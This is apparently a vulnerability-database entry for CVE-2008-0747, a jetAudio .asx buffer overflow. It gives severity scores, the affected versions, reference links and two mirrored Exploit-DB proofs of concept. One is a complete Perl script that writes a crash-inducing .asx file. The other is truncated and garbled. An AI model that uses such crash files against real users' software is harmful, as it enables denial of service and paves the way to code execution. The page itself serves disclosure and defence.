CVE-2008-0747
published 2008-02-13CVE-2008-0747: Stack-based buffer overflow in COWON America jetAudio 7.0.5 and earlier allows user-assisted remote attackers to execute arbitrary code via a long URL in a…
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.86%
93.2th percentile
Stack-based buffer overflow in COWON America jetAudio 7.0.5 and earlier allows user-assisted remote attackers to execute arbitrary code via a long URL in a .asx file, a different vulnerability than CVE-2007-5487.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cowon_america | jetaudio_basic | <= 7.0.5 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
exploitdb·2009-12-25
CVE-2008-0747 jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
---
#!/user/bin/perl
# Exploit Title: [Local Crash Poc]
# Date: [Fri/Dec/25/2009]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.jetaudio.com]
# Version: [jetAudio v 8.0.0.0 Basic]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";
my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "Done..!~#\n";
Exploit-DB
jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)
exploitdb·2008-02-08
CVE-2008-0747 jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)
jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)
---
Application: jetAudio >$file") or die "Cannot open $file: $!";
print $FILE "http://".$payload;
close($FILE);
print "$file has been created \n";
5)Credits
laurent gaffié
laurent.gaffie{remove_this}[at]gmail[dot]com
# milw0rm.com [2008-02-08]
No writeups or analysis indexed.
http://secunia.com/advisories/28855http://securityreason.com/securityalert/3642http://www.securityfocus.com/archive/1/487806/100/0/threadedhttp://www.securityfocus.com/bid/27698http://www.vupen.com/english/advisories/2008/0502https://www.exploit-db.com/exploits/5085http://secunia.com/advisories/28855http://securityreason.com/securityalert/3642http://www.securityfocus.com/archive/1/487806/100/0/threadedhttp://www.securityfocus.com/bid/27698http://www.vupen.com/english/advisories/2008/0502https://www.exploit-db.com/exploits/5085
2008-02-13
Published